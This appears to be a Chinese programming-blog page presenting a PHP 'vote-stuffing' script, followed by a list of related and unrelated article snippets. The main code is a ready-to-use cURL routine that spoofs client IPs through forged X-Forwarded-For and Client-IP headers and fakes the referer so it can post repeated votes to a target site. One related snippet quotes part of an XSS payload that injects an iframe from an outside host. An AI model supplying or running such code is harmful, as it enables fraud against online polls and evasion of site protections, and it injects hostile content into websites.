php刷票程序,解析PHP跨站刷票的实现代码
废话不多说,上代码
function curlrequest($url, $postfield,$referer='',$cookie='') {
//https://www.jb51.net
$ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postfield);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR:'.$ip, 'CLIENT-IP:'.$ip)); //构造IP
curl_setopt($ch, CURLOPT_REFERER, $referer); //构造来路
$data = curl_exec($ch); //运行curl
curl_close($ch);
return $data;
}
$url='http://xxxxx/vote.php';
$ref='http://xxxxx/index.php';
$cookies='';//构造你的cookies
$postfield=array(
'information_id'=>201204211839164950
);
$postfield = http_build_query($postfield);
$result = curlrequest($url, $postfield,$ref,$cookies);
echo $result;
php刷票程序,解析PHP跨站刷票的实现代码相关推荐
- php跨站刷票,解析PHP跨站刷票的实现代码
function curlrequest($url, $postfield,$referer='',$cookie='') { //http://www.jb51.net $ip= rand(100, ...
- 网络安全-跨站请求伪造(CSRF)的原理、攻击及防御
目录 简介 原理 举例 漏洞发现 链接及请求伪造 CSRF攻击 不同浏览器 未登录状态 登录状态 代码查看 工具 防御 用户 程序员 简介 跨站请求伪造(Cross-site requ ...
- PJblog跨站漏洞利用及修补
跨站漏洞成功演示代码: [font=expression(container.document.write(unescape('%3Ciframe%20src%3D%27http%3A//www.go ...
- 跨站漏洞解析-小韩网站编程安全系列一
不算前言的前言 好像已经很久没有写过安全方面的文章了,所谓安全圈子里面,大家也许认为玄猫消失了,不过,我想,作为骇客的玄猫也许从来没有出现过吧.没错的,我是玄猫,如果前两年你看过<黑客X档案&g ...
- [转]跨站漏洞解析及预防
转:百度文库 不算前言的前言 好像已经很久没有写过安全方面的文章了,所谓安全圈子里面,大家也许认为玄猫消失了,不过,我想,作为骇客的玄猫也许从来没有出现过吧.没错的,我是玄猫,如果前两年你看过< ...
- 实际例子描述和分析“猎豹抢票跨站推荐功能跨站有票刷不到”的疑似bug
前言 快过年了,又到了一年抢票时.今年douba和douma计划要带着doudou回姥姥家.昨天在家用抢票软件居然发现了一个bug,那就是在猎豹抢票中跨站推荐的车票几天里一直是没有,但是在12306手 ...
- 实际例子描述和分析“猎豹抢票跨站推荐功能有票刷不到”的疑似bug
前言 快过年了,又到了一年抢票时.今年douba和douma计划要带着doudou回姥姥家.昨天在家用抢票软件居然发现了一个bug,那就是在猎豹抢票中跨站推荐的车票几天里一直是没有,但是在12306手 ...
- 跨站请求伪造(CSRF)-简述
跨站请求伪造(CSRF)-简述 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 ...
- 模拟一次CSRF(跨站请求伪造)例子,适合新手
GET请求伪造 有一个论坛网站,网站有一个可以关注用户的接口,但是必须登录的用户才可以关注其他用户. 这个网站的网站是www.a.com 有一天有一个程序员想提高自己的知名度,决定利用CSRF让大家关 ...
最新文章
- java hashcode返回1_java – 为什么hashCode()在所有连续执行中为对象返回相同的值?...
- Vue+DataTables warning:table id=xxxx -Cannot reinitialize DataTable.报错解决方法
- 自定义MIME类型支持FLV的相关设置
- 扫描过程_PLC的循环扫描工作过程
- 路易斯安那州立大学计算机科学,西北路易斯安那州立大学
- 2022版全球及中国消防设备市场营销策略分析与竞争趋势展望报告
- BZOJ 3244: [Noi2013]树的计数
- 经典排序算法(11)——计数排序算法详解
- android.mk 模块编译,通过Android.mk添加一个编译模块到系统中的顺序如下
- 你的心思很难猜?3亿+用户的心TA都懂!
- javascript数组对象
- vuex辅助函数和vuex5个属性
- jQuery:将文本转化成JSON对象应注意的问题
- cie规定的标准光源_孩视宝:健康自然的光源是护眼灯发展的重点
- js时间戳转化成日期格式
- 【十次方】Springboot中使用SpringCache做缓存
- Mybatis插入大量数据效率对比:foreach插入、SqlSession批量插入、sql插入
- Task-conditioned Domain Adaptation for Pedestrian Detection in Thermal Imagery(多光谱行人检测)
- 开源项目—FLutter/iOS/Android编写的三个计算器APP
- P4409 [ZJOI2006]皇帝的烦恼(20190922B)(乱搞)